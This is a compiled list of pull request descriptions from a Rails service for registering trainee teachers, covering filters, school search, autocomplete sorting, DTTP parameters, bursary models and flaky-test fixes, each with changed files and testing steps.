The example data generator specs were failing intermittently on schools (URN) and subjects (code) validations:
```
1) example_data:generate creates two providers
Failure/Error: subjects = FactoryBot.create_list(:subject, 20)
ActiveRecord::RecordInvalid:
Validation failed: Code has already been taken
```
Adds a `.unique` to the Faker calls to return all unique values.

[xxx] Fix flakey example_rake specs

---

app/components/trainees/filters/view.html.erb
app/models/trainee.rb
app/models/trainee_filter.rb
app/services/trainees/filter.rb
app/view_objects/home_view.rb
config/initializers/training_routes.rb
db/schema.rb
spec/factories/trainees.rb
spec/models/trainee_filter_spec.rb
spec/models/trainee_spec.rb
spec/services/trainees/filter_spec.rb

https://trello.com/c/skmQZxkS/1846-m-ey-add-eyts-states-to-the-state-filter
- Change the existing state filters for QTS to only return QTS trainees in award states
- Add EYTS state filters to the trainee index page
- rename trainee filter spec so that it runs as part of the test suite
- slight refactor of home view to utilize new scopes

[1846] add EYTS state filter

---

spec/features/end_to_end/early_years_assessment_only_journey_spec.rb
spec/features/end_to_end/early_years_postgrad_journey_spec.rb
spec/support/features/course_details_steps.rb
spec/support/features/training_route_steps.rb
spec/support/page_objects/trainees/new.rb

https://trello.com/c/axXKqAxy/1865-m-ey-end-to-end-feature-spec-for-each-route
- End to end feature specs for both `assessment_only` and `postgrad` early years routes

[1865] Add e2e feature specs for early years assessment_only & postgrad routes

---

app/components/form_components/autocomplete/script.js
app/components/form_components/autocomplete/sort.js
app/helpers/degrees_helper.rb
app/helpers/nationalities_helper.rb
app/lib/dttp/code_sets/degree_types.rb
app/views/trainees/degrees/_uk_degree_form.html.erb
app/views/trainees/personal_details/_nationality_select_field.html.erb
app/views/trainees/personal_details/edit.html.erb
app/webpacker/scripts/autocomplete_sort.spec.js
spec/features/form_sections/personal_and_education_details/degrees/adding_degree_spec.rb
spec/helpers/degree_helper_spec.rb
spec/helpers/nationalities_helper_spec.rb
spec/support/features/degree_information_steps.rb

https://trello.com/c/yVBgFUSO/1841-l-productionize-the-sorted-autocomplete-code
This PR contains the implementation of this spike: https://github.com/DFE-Digital/register-trainee-teachers/pull/749
The aim was to add a sort function to all autocompletes and develop a wider 'options' API such that we could:
- sort autocomplete results in an intelligent, weighted way
- use synonyms specified in select options
- boost specific entries
- work with richer data
Adds a client-side sort function to all our standard autocompletes - not schools (where the results are determined on the backend) and not countries (external lib).
There are two parts to this - changes to the native select input, and changes to the autocomplete JS.
**The select input**
- The options within the targeted select input now …

[1841] Sort function for autocompletes

---

app/controllers/trainees/employing_schools_controller.rb
app/controllers/trainees/lead_schools_controller.rb
app/forms/schools/form.rb
app/views/trainees/employing_schools/_results.html.erb
app/views/trainees/lead_schools/_results.html.erb

https://trello.com/c/4BVXl0E0/1886-no-validation-if-no-option-is-chosen-on-non-js-page
* The before action `redirect_to_search_page` was breaking the validation as the non-js/index page was being reloaded. Added conditional return so that validations are triggered when index page is re-rendered instead on failure to save. 
* Hidden field added on  `_results` partial so that controller action can determine which page to render on failure to save depending on js or non js, edit or index
* Error summary appears above h1 in line with rest of app
Test validation on both `/lead-schools/edit` and `/lead-schools?query` (and employing schools). Turns JS off to test `/lead-school?query`(index page)

[1886] Validation bug on school search non-js

---

app/lib/dttp/mappable.rb
app/lib/dttp/params/placement_assignment.rb
spec/lib/dttp/params/placement_assignment_spec.rb

https://trello.com/c/dobeslWP/1679-l-add-employing-and-lead-school-to-the-params
- Update `Dttp::Params::PlacementAssignment` to include school params if certain conditions are met
- It's a bit messy running it manually, but I managed to submit for TRN via console using reall school DTTP IDs
- Open Postman => Retrieve Placement Assignments List Show (DTTP ID should be e338f0c7-67c8-eb11-bacc-000d3ab7dc55)
- Look out for `_dfe_leadschoolid_value` and `_dfe_employingschoolid_value` - they should be populated

[1679] Add lead and employing school to DTTP params

---

app/components/form_components/autocomplete/script.js

https://trello.com/c/LZtcths6/1826-pre-filled-invalid-entries-get-suggested-by-autocomplete
If an autocomplete field has a value that yields no results and the user still submits the form, when the form is re-rendered with validation errors, that field no longer displays "No results round" when clicked on. Instead it displays the invalid value currently in the field.
First of all, we need to determine if the field has a validation error. If so, the `defaultValue` needs to be an empty string, otherwise `accessible-autocomplete` will use the `defaultValue` to render the option which we don't want because that's the source of the problem. However, we still need the input field generated by `accessible-autocomplete` to hold the value that was previously submitted. We do this in a separate …

[826] Bug fix: pre-filled invalid entries get suggested by autocomplete

---

app/lib/dttp/params/placement_assignment.rb
spec/lib/dttp/params/placement_assignment_spec.rb

https://trello.com/c/wskrsKOd/1852-m-ey-send-correct-age-range-and-subject-to-dttp
We've removed the subject and age range inputs from the course details form for Early years trainees. However, we still need to send a subject and an age range to DTTP.
- Hardcodes the Early years subject DTTP ID in the placement assignment params.
- Selects the correct Early years age range (`ZERO_TO_FIVE`) in the placement assignment params.

[1852] Hard code EY subject and age range for DTTP

---

app/jobs/dttp/sync_providers_job.rb
app/jobs/dttp/sync_schools_job.rb
app/jobs/dttp/sync_users_job.rb
app/services/dttp/contact_update.rb
app/services/dttp/create_dormancy.rb
app/services/dttp/recommend_for_award.rb
app/services/dttp/register_for_trn.rb
app/services/dttp/update_dormancy.rb
app/services/dttp/update_trainee_status.rb
app/services/dttp/withdraw_trainee.rb
app/services/send_welcome_email_service.rb
config/settings.yml
config/settings/production.yml
spec/jobs/dttp/sync_providers_job_spec.rb
spec/jobs/dttp/sync_schools_job_spec.rb
spec/jobs/dttp/sync_users_job_spec.rb
spec/services/dttp/contact_update_spec.rb
spec/services/dttp/create_dormancy_spec.rb
spec/services/dttp/recommend_for_award_spec.rb
spec/services/dttp/register_for_trn_spec.rb
spec/services/dttp/update_dormancy_spec.rb
spec/services/dttp/update_trainee_status_spec.rb
spec/services/dttp/withdraw_trainee_spec.rb
spec/services/send_welcome_email_service_spec.rb
spec/support/feature_flags.rb

Our non-production environments are reporting a lot of errors due to various lacking configuration.
Add feature flags for some of the integrations and disable them in non-production. Once these are in and we reduce the number of errors we can review further. This should cover the bulk of those being reported from the review apps.

[1900] Disable features in non-production

---

app/helpers/trainee_helper.rb
spec/features/form_sections/teacher_training_data/edit_publish_course_details_spec.rb

- [This trello ticket](https://trello.com/c/AtWL1CYk/1938-choosing-another-course-not-listed-doesnt-allow-you-to-re-choose-a-course)
- `show_publish_courses(trainee)` was checking if the trainee had also checked the `course not listed` option. This meant that if the trainee had selected this option, they could never change their course as the flow would not allow them to. 
- I removed this conditional to ensure that the confirm page would allow them to change the course. 
- This also meant that from the review-draft page, it would take the user through the whole flow instead of going straight to the subjects section, meaning that one test was changed as well. 
- Create a trainee on the `provider_led_postgrad` route
- On the course details section, select `Another course not listed` and …

[1938] Ability to change course reinstated even if you choose 'another course' option

---

app/controllers/trainees/publish_course_details_controller.rb
app/forms/course_details_form.rb
spec/forms/course_detail_form_spec.rb

- [This trello ticket](https://trello.com/c/OiYr9UZr/1932-m-when-you-edit-the-details-fro-a-publish-course-it-forgets-that-its-a-publish-course)
- `course_code` param in the form was being set to nil, but there was a `course_code` method already implemented which persists the trainee course code. I set the params to use this `course_code` method
- Create a trainee on a Provider Led Postgrad route
- Assign them to a Publish Course
- Confirm the course
- Change that course subject
- The publish course will now not be wiped and the course will persist on the next confirm page, with the new subject attached to the trainee

[1932] Course details form persists course_code if exists

---

app/components/trainees/confirmation/diversity/view.rb
app/components/trainees/confirmation/schools/view.rb
app/helpers/school_helper.rb
config/locales/en.yml
spec/components/trainees/confirmation/diversity/view_spec.rb

https://trello.com/c/LZtcths6/1826-pre-filled-invalid-entries-get-suggested-by-autocomplete
Some sections such as diversity information and schools have multi-page journeys. If the user happens to exit that journary somewhere along the way without finishing, the confirmation page needs to inform the user that some parts are unfinished.
- Add the message "Answer missing" to diversity and school confirmation pages if they are incomplete
- Create a "School direct (salaried)" trainee
- Enter "Diversity information" page and click "Yes"
- Go back to review draft page using back button
- Re-enter "Diversity information"
- Confirmation page should display the message "Answer missing" for Ethnicity and Disability
- Enter "Schools" page and chose a lead school
- Go back to review draft page using …

[1901] Display "Answer missing" on confirmation pages if data missing

---

app/forms/diversities/form_validator.rb
spec/factories/trainee_disabilities.rb
spec/factories/trainees.rb
spec/features/form_sections/personal_and_education_details/reviewing_apply_trainee_data_spec.rb
spec/forms/diversities/form_validator_spec.rb

- https://trello.com/c/7h3M0Axn/1943-fix-progress-computing-for-diversity-section
The form validator for the diversity information is used by the progress service (and trn submission) to workout whether that section has been started, in progress or completed. It's a coordinator of sorts of other sub form objects for each part of the diversity flow. 
Prior to this change, it didn't validate the scenario where a user could side step some of the forms if they disclosed diversity information and checked the section as completed. The label would still show as completed which is incorrect.
- Refactor the `Diversities::FormValidator` to validate the scenario above. 
- Simplify the spec for this class, it was becoming a little hard to grok with all the nesting
- Simplify the default trainee …

[1943] Fix diversity form validator

---

app/components/trainees/confirmation/course_details/view.rb
config/locales/en.yml
spec/components/trainees/confirmation/course_details/view_spec.rb

https://trello.com/c/tpUYFEEI/1853-m-ey-course-details-summary-component
* Updated "Type of course" to "Route"
* Route on the component is shown if draft and if non early years route

[1853] EY - course details summary component

---

app/components/paginated_filter/view.html.erb
app/components/paginated_filter/view.rb
app/views/trainees/index.html.erb
app/webpacker/styles/application.scss
config/locales/en.yml
spec/components/trainees/sort_links/view_spec.rb

Moving the `Export these records` link to above the trainees list. 
- Navigate to the trainees page and inspect the `Export these records` link
- Check that it still exports filtered results
- Check the responsiveness of the page and that when the window becomes too small the link moves to the correct place
- Mobile format is excluded from this ticket as it is in another

[1864] Move export link above trainees list

---

config/settings/development.yml
config/settings/qa.yml
config/settings/review.yml

https://trello.com/c/O86GRNid/1963-turn-on-ey-routes-in-qa
Switch on `early_years_assessment_only` and `early_years_postgrad` in QA for testing.
I also changed the review apps and development env to show the same routes for consistency.
- Check that the only two early years routes available when creating a trainee are `early_years_assessment_only` and `early_years_postgrad`

[1963] Turn on EY routes in QA

---

app/views/trainees/outcome_details/recommended.html.erb

Making the 'recommended for award' page body text 2/3 width
- Navigate to a trainee that can be recommended for QTS for example, one in a `TRN RECEIVED` state.
- Recommend the trainee for QTS or EYTS and check that the whole page is the correct width.
**Before**
**After**

[1856] Make recommended for award page body text 2/3 width

---

app/views/trainees/lead_schools/edit.html.erb
config/locales/en.yml

- [This trello ticket](https://trello.com/c/63EGrEH9/1955-s-add-content-to-the-lead-school-page)
- Changed the hint text to include more info on the edit lead school page
- Select a trainee on a school direct route and visit the edit lead school page (`/trainees/{slug}/lead-schools/edit`)

[1955] Hint text updated for lead schools

---

app/controllers/trainees/confirm_reinstatements_controller.rb
spec/controllers/trainees/confirm_reinstatements_controller_spec.rb

https://trello.com/c/tKmwy4r8/1934-reinstating-trainees-doesnt-update-their-state-if-they-have-a-trn
There is a check in `trin_received!` that explicitly prevents transition
If the trainee is in a deferred or withdrawn state (for if the trainee
receives a trn when they are in that state). So we can use one of the
built-in methods provided by the state machine
Fix it
Find a deferred or withdrawn trainee on the review app and reinstate them.

[1934] Fix trainee state update on reinstatement

---

config/initializers/redis.rb
config/initializers/sidekiq.rb
terraform/modules/paas/main.tf
terraform/modules/paas/variables.tf

We need redis instances with different eviction policies configured for app cache and worker queues.
Create two different redis instances with different eviction policies.
Initialise `Redis.current` with the app cache instance's connection string.
Initialise sidekiq with the redis worker connection string.

Separate redis instances for app cache and worker

---

app/views/trainees/not_supported_route.html.erb
config/locales/en.yml

- Update the copy on the `/trainees/not-supported-route`
- https://register-pr-1009.london.cloudapps.digital/trainees/not-supported-route

[1844] Update not supported route content

---

app/jobs/create_or_update_consistency_check_job.rb
spec/jobs/create_or_update_consistency_check_job_spec.rb

We shouldn't create consistency check records for trainees that have not
been sent to DTTP.
There were a few of these in the DB and they error. I've removed them.
* Add a guard to prevent them being created.

[xxx] Don't consistency check drafts

---

app/models/school.rb
app/services/school_search.rb
app/services/strip_punctuation.rb
spec/models/school_spec.rb
spec/services/school_search_spec.rb
spec/services/strip_punctuation_spec.rb

This change will ensure that apostrophes and other special characters are stripped off when searching, as well as when updating the ts_vector
1. Strip non alphabetic characters when querying
2. Strip non alphabetic characters when updating the ts vector 
1. Ensure that you have schools with names containing non-alphabetic characters (eg, St Mary's/Andrew's). 
If not, they can be loaded using `bundle exec rake schools_data:import`.
2. Create a Trainee in the school direct route, and visit the Schools section.
3. In the School picker, search for the name with and without, eg: `Marys` or `Mary's`. Both should return the same results.

[1917] Ensure searches can be made without including punctuation/special characters

---

app/components/form_components/schools_autocomplete/script.js
app/controllers/api/schools_controller.rb
app/controllers/trainees/employing_schools_controller.rb
app/controllers/trainees/lead_schools_controller.rb
app/forms/schools/employing_school_form.rb
app/forms/schools/form.rb
app/forms/schools/lead_school_form.rb
app/views/trainees/employing_schools/_results.html.erb
app/views/trainees/employing_schools/edit.html.erb
app/views/trainees/employing_schools/index.html.erb
app/views/trainees/lead_schools/_results.html.erb
app/views/trainees/lead_schools/edit.html.erb
config/locales/en.yml
spec/forms/schools/employing_school_form_spec.rb
spec/forms/schools/lead_school_form_spec.rb
spec/support/page_objects/trainees/edit_employing_school.rb
spec/support/page_objects/trainees/edit_lead_school.rb
spec/support/shared_examples/school_form_validations.rb

Extending from https://github.com/DFE-Digital/register-trainee-teachers/pull/964, this change adds an error messaeg if the query is shorter than expected.
1. Query a (lead/employing) school with zero or one characters to get a new error: "Enter at least two characters".
2. In the results page (radio buttons), the option values are intentionally unselected
3. (Non-js) Not explicitly selecting "Search again", but providing a search query will allow the user to search again, instead of skipping to the confirm page.

[1933] Show a query is shorter than the limit error message

---

app/components/start_page_banner/view.html.erb
app/controllers/request_an_account_controller.rb
app/views/request_an_account/index.html.erb
app/views/sign_in/index.html.erb
config/locales/en.yml
config/routes.rb
spec/features/static_pages_spec.rb
spec/support/features/page_helpers.rb
spec/support/page_objects/request_an_account.rb
spec/support/page_objects/start.rb

https://register-pr-1013.london.cloudapps.digital/
We are creating a new request account page. The `request an account` link on the start page will take us there. 
- Add HTML for request account page
- Add `/request-an-account` route
- Add controller with `index` method
- Remove text from DfE sign in page
- Navigate to the start page and click on `request an account`
- Inspect the page, check that the links works as per the Trello ticket
- Ensure the email subject populates correctly

[1954] Add request an account page

---

spec/lib/dttp/params/placement_assignment_spec.rb

Fixed the stubbing of the constant `Dttp::CodeSets::AgeRanges::MAPPING` in the test. If a trainee is generated with age_range 0-5, then this constant is stubbed with two identical keys.

[2000] Fix flaky spec

---

app/controllers/api/schools_controller.rb
app/controllers/trainees/employing_schools_controller.rb
app/controllers/trainees/lead_schools_controller.rb
app/services/school_search.rb
app/views/trainees/employing_schools/_results.html.erb
app/views/trainees/employing_schools/index.html.erb
app/views/trainees/lead_schools/_results.html.erb
app/views/trainees/lead_schools/index.html.erb
spec/services/school_search_spec.rb

https://trello.com/c/6XLafxT9/1915-m-refactor-schools-search-class-to-return-an-instance-of-itself
`SchoolSearch` service returns OpenStruct object allowing `SchoolResultNotice` component and controllers to access its properties
A limit can be set in future and not cause the component to fail silently for the user

[1915] Refactor school search service and controllers

---

app/components/application_record_card/view.rb
app/controllers/trainees/timelines_controller.rb
app/helpers/trainee_helper.rb
app/models/trainee.rb
app/views/trainees/show.html.erb
config/environments/production.rb
config/initializers/redis.rb
spec/components/application_record_card/view_spec.rb
spec/models/trainee_spec.rb

https://trello.com/c/ea3RZgLY/1902-record-updated-date-doesnt-match-on-records-list-and-within-record
At the moment, we generate a timeline of events for the trainee which is rendered in the timeline view `trainees/{trainee_slug}/timeline`. We decided that the `updated_at` field used in the UI should reflect the last updated timeline event.
The problem is we compute the timeline entries every time we need to reference this date somewhere other than the timeline view. It's amplified even more on the record list as it'll do the computation per trainee. This might be ok for the small number of trainees but can quickly become a problem as the list of the trainees grow.
Two approaches were considered:
**Compute a hash table of trainee_ids matched to the last updated date** - this means we …

[1902] Cache timeline computation

---

app/models/allocation_subject.rb
app/models/subject_specialism.rb
db/migrate/20210616110455_create_allocation_subjects.rb
db/migrate/20210616124359_create_subject_specialisms.rb
db/schema.rb
spec/factories/allocation_subjects.rb
spec/factories/subject_specialisms.rb
spec/models/allocation_subject_spec.rb
spec/models/subject_specialism_spec.rb

https://trello.com/c/pXx6En7b/1994-s-add-allocation-subjects-and-specialism-subjects
Add subject specialism and allocation subject model + migrations + associations with fields specified in ticket
Model tests to verify associations

[1994] Set up allocation subject + subject specialisms

---

app/models/allocation_subject.rb
app/models/bursary.rb
app/models/bursary_subject.rb
app/services/calculate_bursary.rb
db/migrate/20210616102540_create_bursaries.rb
db/migrate/20210617084351_create_bursary_subjects.rb
db/schema.rb
spec/factories/allocation_subjects.rb
spec/factories/bursaries.rb
spec/factories/bursary_subjects.rb
spec/models/allocation_subject_spec.rb
spec/models/bursary_spec.rb
spec/models/bursary_subject_spec.rb
spec/services/calculate_bursary_spec.rb

https://trello.com/c/J7qEEOP6/1983-m-funding-bursary-calculator
Based off https://github.com/DFE-Digital/register-trainee-teachers/pull/1017 for `AllocationSubject` and `SubjectSpecialism`.
- Creates `Bursary` and `BursarySubject` models
- Adds a backend service that implements two methods:
1. **`for_route_and_subject`**: given a training route and a subject specialism, returns the amount of an available bursary e.g. `CalculateBursary.for_route_and_subject("provider_led_postgrad", "maths") => 24_000`
2. **`available_for_route?`**: given a training route, returns true or false whether there are any bursaries available e.g `CalculateBursary.available_for_route?("assessment_only") => false`
The first can be used to display the amount available for a trainee.
The second can be used to decide …

[1983] Bursary calculator

---

config/webpacker.yml

Webpacker seems to be compiling assets on every feature spec which is making the tests slow. 
Don't do that...
This reduces the suite runtime on my machine from ~3mins to ~1min.
Run the specs on master. Go and get a brew. On your return note the time taken.
Run the specs on this branch. Don't blink. Marvel at the amazing speed 🚀

[2030] Don't compile assets in test

---

app/components/cancel_link/view.html.erb
app/components/cancel_link/view.rb
app/lib/page_tracker.rb
app/views/trainees/confirm_details/show.html.erb
app/views/trainees/diversity/confirm_details/show.html.erb
spec/lib/page_tracker_spec.rb

https://trello.com/c/RODutady/2024-bug-cancel-and-return-to-record-links-dont-respect-origin-pages
We have many "Cancel and return to record" links across the service, however they did not 'remember' the tabs for non-draft trainees. They all returned to 'About their teacher training'.
This PR uses the `PageTracker` to return to the correct origin page.
- Added a new method to the `PageTracker` called `last_non_confirm_origin_page`, since these links should never return to a confirm page even if that page is in the history. They explicitly just go back to the 'record'.
- Used this method in the `CancelLink` component.
- Ensured that this `CancelLink` component is being used everywhere we need it (there were a couple of places we'd missed).
- Head to a non-draft trainee
**Check 1**
- Click …

[2024] Ensure 'Cancel and return' links go back to the correct origin page

---

app/components/paginated_filter/view.html.erb
app/components/paginated_filter/view.rb
app/components/trainees/filters/view.html.erb
app/components/trainees/filters/view.rb
app/controllers/trainees_controller.rb
app/helpers/trainee_helper.rb
app/view_objects/home_view.rb
app/views/trainees/index.html.erb
spec/components/trainees/filters/view_preview.rb
spec/components/trainees/filters/view_spec.rb
spec/features/trainee_actions/filtering_trainees_spec.rb
spec/support/page_objects/trainees/index.rb

https://trello.com/c/Fv84bibz/1849-m-training-route-filter-on-trainees-list
- Add training route option to trainee filter
- Split out filtering options from the trainee filter so we don't perform db queries etc in the component
Check with a user that only has trainees with one type of training route, and one with multiple, also in conjunction with other filters

[1849] Add training route filter for trainees

---

app/jobs/register_for_trn_job.rb
app/lib/dttp/params/contact.rb
app/services/dttp/register_for_trn.rb
spec/jobs/register_for_trn_job_spec.rb
spec/lib/dttp/params/contact_spec.rb
spec/services/dttp/register_for_trn_spec.rb

https://trello.com/c/9B0qGvtA/2029-registerfortrn-argument-naming
We already have context of what this id is for, as the job is about
Creating a trainee/contact, so trainee doesn’t need to be in the name.
This also maps better to how the value is named in http.
Do the renaming

[2029] Rename trainee_creator_dttp_id -> created_by_dttp_id

---

config/initializers/training_routes.rb
db/seeds.rb

https://trello.com/c/DXdxak0I/2038-s-seed-bursaries
- Seeds bursaries into the DB for trainee routes that we are currently developing as per the spreadsheet linked in the Trello ticket.
- Bursaries are per training route and are related to the (now seeded) allocation subjects.
- Run `rake db:seed`

[2038] Add bursaries to DB seeds

---

app/helpers/course_details_helper.rb
app/views/trainees/course_details/edit.html.erb
config/locales/en.yml
config/settings.yml
config/settings/development.yml
config/settings/review.yml
spec/components/trainees/route_indicator/view_preview.rb
spec/factories/allocation_subjects.rb
spec/factories/subject_specialisms.rb
spec/factories/trainees.rb
spec/features/form_sections/teacher_training_data/edit_course_details_spec.rb
spec/features/trainee_actions/filtering_trainees_spec.rb
spec/helpers/course_details_helper_spec.rb
spec/services/trainees/filter_spec.rb
spec/support/features/course_details_steps.rb

Use Subject Specialisms to populate subject dropdown options
1. Fetch SubjectSpecialisms from the local data store and use those in place of `Dttp::CodeSets::CourseSubjects::MAPPING`
2. Add a feature flag to toggle the new specialisms in the dropdown.
1. Create a few subject specialisms (i.e: `FactoryBot.create_list(:subject_specialism, 100)`
2. Attempt to create/update a trainee, and visit the course details section.
3. The subjects dropdown should be using records from the subject specialisms.
4. Ensure that the new specialism subject (and additional subjects, if selected) are saved against the trainee.

[1996] Update the course subjects dropdown to use subject specialisms

---

app/components/review_draft/apply_draft/view.html.erb
app/components/review_draft/apply_draft/view.rb
app/components/review_draft/draft/view.html.erb
app/components/review_draft/draft/view.rb
app/components/task_list/view.html.erb
app/components/task_list/view.rb
app/helpers/funding_helper.rb
app/helpers/task_list_helper.rb
app/models/trainee.rb
config/settings.yml
config/settings/development.yml
config/settings/review.yml
spec/components/review_draft/apply_draft/view_spec.rb
spec/components/review_draft/draft/view_spec.rb
spec/components/task_list/view_preview.rb
spec/components/task_list/view_spec.rb
spec/support/shared_examples/rendering_the_funding_section.rb

https://trello.com/c/OBU0jXKA/1986-m-funding-ui-conditional-link-to-funding-form
- Adds a new `active` property to a 'TaskList' row so that we can render a link or not.
- Renders an 'inactive' Funding section when:
1. a trainee is on a route that has bursaries available
2. the trainee has not filled in their course subject details
- Renders a normal (placeholder for now) Funding section in all other cases as per the Trello ticket.
**Case 1**
Route has no bursaries:
**Case 2**
Route has bursaries, trainee has not completed course details:
**Case 3**
Route has bursaries, trainee has completed course details:
**Check 1**
- Go to a draft assessment only trainee
- Check that there is a link to Funding at the bottom of the table with the status 'not started'
**Check 2**
- Go to a draft provider …

[1986] Link to funding forms

---

app/forms/diversities/form_validator.rb

- [This trello ticket](https://trello.com/c/PQwvlUUw/2052-bug-selecting-not-provided-in-the-ethnicity-part-of-the-diversity-form-doesnt-allow-completion-of-form)
- At the moment the form was deemed invalid because ethnic background was nil, even though the trainee had selected `Not Provided` as their ethnic group (meaning that their ethnic background WAS indeed nil)
- I didn't remove the validator for the ethnic background, but rather checked if the trainee had selected `Not provided` as their ethnic group, meaning we would exit early if they had and not look for their ethnic background
- Make a trainee
- On their review draft page
- Go to `diversities`
- Select `Yes` for `Has trainee shared diversity information`
- Select `Not provided` when prompted `What is their ethnic group?`
- …

[2052] Check if trainee ticks not provided in ethnic group before validating the ethnic background

---

app/helpers/application_helper.rb
app/helpers/course_details_helper.rb
app/models/subject_specialism.rb
app/models/trainee.rb
app/validators/autocomplete_validator.rb
app/views/trainees/course_details/_additional_subjects.html.erb
app/views/trainees/course_details/edit.html.erb
app/views/trainees/degrees/_non_uk_degree_form.html.erb
app/views/trainees/degrees/_uk_degree_form.html.erb
app/views/trainees/index.html.erb
config/locales/en.yml
db/migrate/20210622120839_add_case_insensitive_index_to_subject_specialism.rb
db/schema.rb
spec/factories/allocation_subjects.rb
spec/factories/subject_specialisms.rb
spec/features/form_sections/teacher_training_data/edit_course_details_spec.rb
spec/helpers/course_details_helper_spec.rb
spec/helpers/degree_helper_spec.rb
spec/models/subject_specialism_spec.rb
spec/models/trainee_spec.rb
spec/validators/autocomplete_validator_spec.rb

Ensure that subject names are formatted in correct cases in the UI, as the database may hold re-worded/lower cased names
1. Add a lowecase uniqueness validation for subject specialism name, and corresponding validations
2. Change Trainee#with_subject scope to search without case-sensitivity
3. Change select dropdowns to render values as is, but upcase the first character in the UI
4. In the autocomplete validator, downcase before comparing the value with the raw value.

[2045] Titlelize the subject dropdown

---

app/controllers/trainees/funding/training_initiatives_controller.rb
app/forms/funding/training_initiatives_form.rb
app/helpers/funding_helper.rb
app/helpers/task_list_helper.rb
app/models/progress.rb
app/models/trainee.rb
app/services/form_store.rb
app/views/trainees/funding/training_initiatives/edit.html.erb
config/initializers/training_routes.rb
config/locales/en.yml
config/routes.rb
db/migrate/20210622090328_add_training_initiative_to_trainee.rb
db/schema.rb
spec/features/form_sections/teacher_training_data/edit_training_initiative_spec.rb
spec/forms/funding/training_initiatives_form_spec.rb
spec/models/trainee_spec.rb
spec/support/features/page_helpers.rb
spec/support/page_objects/trainees/funding/training_initiative.rb

https://trello.com/c/Y8z7YIHu/1987-m-funding-ui-training-initiative-radio-button-form
- Adds a new enum to `trainee` called `training_initiative`
- Adds a new form to record the `training_initiative`
- Links to the new form from the Funding link on `/review-draft`
- Adds a new progress field `funding` (not currently used, but needed to render the status of the section on `/review-draft`)
And in error:
- Choose a an assessment only trainee
- Click on the link to 'Funding'
- Check that you cannot submit an empty form
- Check that the correct training initiatives are rendered as per the spreadsheet in the Trello ticket
- Choose a training initiative and submit the form
- Check that the status for the funding section is now in progress
- Check that if you return to the form, your previous …

[1987] Training initiative form

---

app/forms/confirm_publish_course_form.rb
app/helpers/trainee_helper.rb
app/lib/dttp/code_sets/allocation_subjects.rb
app/lib/dttp/code_sets/course_subjects.rb
app/services/calculate_subject_specialisms.rb
config/initializers/publish_subject_mapping.rb
db/seeds.rb
spec/factories/courses.rb
spec/factories/subjects.rb
spec/features/form_sections/teacher_training_data/edit_publish_course_details_spec.rb
spec/forms/confirm_publish_course_form_spec.rb
spec/services/calculate_subject_specialisms_spec.rb

https://trello.com/c/EsEeJeEx/1995-l-map-publish-subjects-to-subject-specialism
- New `CalculateSubjectSpecialisms` class to work out how to populate `Trainee` attributes `course_subject_one`, `course_subject_two` and `course_subject_three` which are now meant to store a "subject specialism" instead of the subject name.
- Update `ConfirmPublishCourseForm` to use `CalculateSubjectSpecialisms`
- Create a "Provider-led (postgrad)" trainee (make sure the trainee's provider has courses)
- Visit "Course details" and choose a course that has a subject with mulitple specialisms (see [here](https://docs.google.com/spreadsheets/d/1MRDfp6KUSEL9RslzidpWzqvlbli0H6iuibLXno5Gd6E/edit?ts=60c0f4ce#gid=597746131) for spreadsheet)
- Continue and confirm course
- Open console and find the trainee
- Inspect …

[1995] Map publish subjects to subject specialism

---

Dockerfile

We get concurrent migration errors occasionally when more than one instance is started. We used to ignore these but we've lost that when we added data migrations.
Update the start command to use the db migration script that we added that catches concurrent migration errors.
This restores behaviour we had before but we'll need to consider now that the data migrations could be started in a race condition in a similar way to the db migrations and possibly run twice at the same time.

[xxx] Ignore concurrent migrations

---

config/application.rb

We want an error to be reported if a translation is missing to avoid
them being silently displayed to users as missing translation text.
Raise when they're missing in all envs.

[xxx] Raise on missing translations

---

spec/lib/dttp/params/placement_assignment_spec.rb

We have a flakey test.
Stub the age_range constant correctly for each context.

[xxx] Second attempt to fix flakey EY test

---

config/locales/en.yml

- [This trello ticket](https://trello.com/c/GrnyBweS/2061-bug-missing-translation-for-invalid-degree-subject)
- Added missing translation for Subject
- Go to degree form and input an invalid subject (not blank though) and you will see the invalid subject error

[2061] Added missing translation for subject

---

app/helpers/course_details_helper.rb
config/settings.yml
config/settings/development.yml
config/settings/review.yml
spec/features/form_sections/teacher_training_data/edit_course_details_spec.rb
spec/features/trainee_actions/filtering_trainees_spec.rb
spec/helpers/course_details_helper_spec.rb
spec/services/trainees/filter_spec.rb
spec/support/features/course_details_steps.rb

- [This trello ticket](https://trello.com/c/Kaoa6t6z/2040-remove-the-usesubjectspecialism-feature-flag)
- Removed the feature flag for the use_subject_specialisms
- Run the test suite and check on the review app for the new subject specialisms being user

[2040] Removed use_subject_specialisms feature flag and old tests

---

spec/features/form_sections/teacher_training_data/edit_publish_course_details_spec.rb

- [This trello ticket](https://trello.com/c/JICgXpk7/2065-bug-flakey-test)
- Regex was accidentally thinking that the course code for modern languages included `other` as it was in between brackets, like the code
- Changed regex to only look between brackets that have 4 char length (the same as the code)
- Run `rspec spec/features/form_sections/teacher_training_data/edit_publish_course_details_spec.rb`

[2065] Regex changed to look for 4 chars

---

app/controllers/trainees/confirm_details_controller.rb
app/controllers/trainees/funding/bursaries_controller.rb
app/forms/funding/bursary_form.rb
app/helpers/funding_helper.rb
app/services/form_store.rb
app/views/trainees/funding/bursaries/edit.html.erb
config/locales/en.yml
config/routes.rb
db/migrate/20210621161519_add_applying_for_bursary_to_traine.rb
db/schema.rb
spec/factories/trainees.rb
spec/features/form_sections/teacher_training_data/edit_bursary_spec.rb
spec/forms/funding/bursary_form_spec.rb
spec/support/features/page_helpers.rb
spec/support/page_objects/funding/burary.rb

https://trello.com/c/QjRvOnc5/1988-m-funding-ui-bursary-radio-button-form
- Small refactor to routes and the way confirmation pages are calculated (see commit message for f3d6bcf)
- Adds edit bursary form (yes or no)
Can't really be tested easily as the page can't be navigated to, and it the form doesn't have a confirmation page to go to. You can manually visit the url of the format `trainees/HxA35kmiNdtwNGnWYjr6FbJZ/funding/bursary/edit`
You will need to make sure that there is a bursary for your given trainee training route/course subject, see `SEED_BURSARIES` for inspiration.

[1988] funding bursary form

---

db/data/20210624155310_change_primary_to_primary_teaching.rb

- At the moment, trainees with `Primary` as their `course_subject_one` are raising errors when being submitted for TRN as we have phased out the subject, and its replaced with `Primary teaching`. This PR changes that field for the trainees. 
- Added a DB migration to migrate trainees with `Primary` as their first course subject to instead have `Primary teaching`
- Run `rake db:migrate`

[xxxx] Migrate Primary subjects to Primary teaching

---

app/components/application_record_card/style.scss
app/components/application_record_card/view.html.erb
app/components/application_record_card/view.rb
app/components/base.scss
app/components/paginated_filter/script.js
app/components/paginated_filter/style.scss
app/components/paginated_filter/view.html.erb
app/webpacker/styles/application.scss
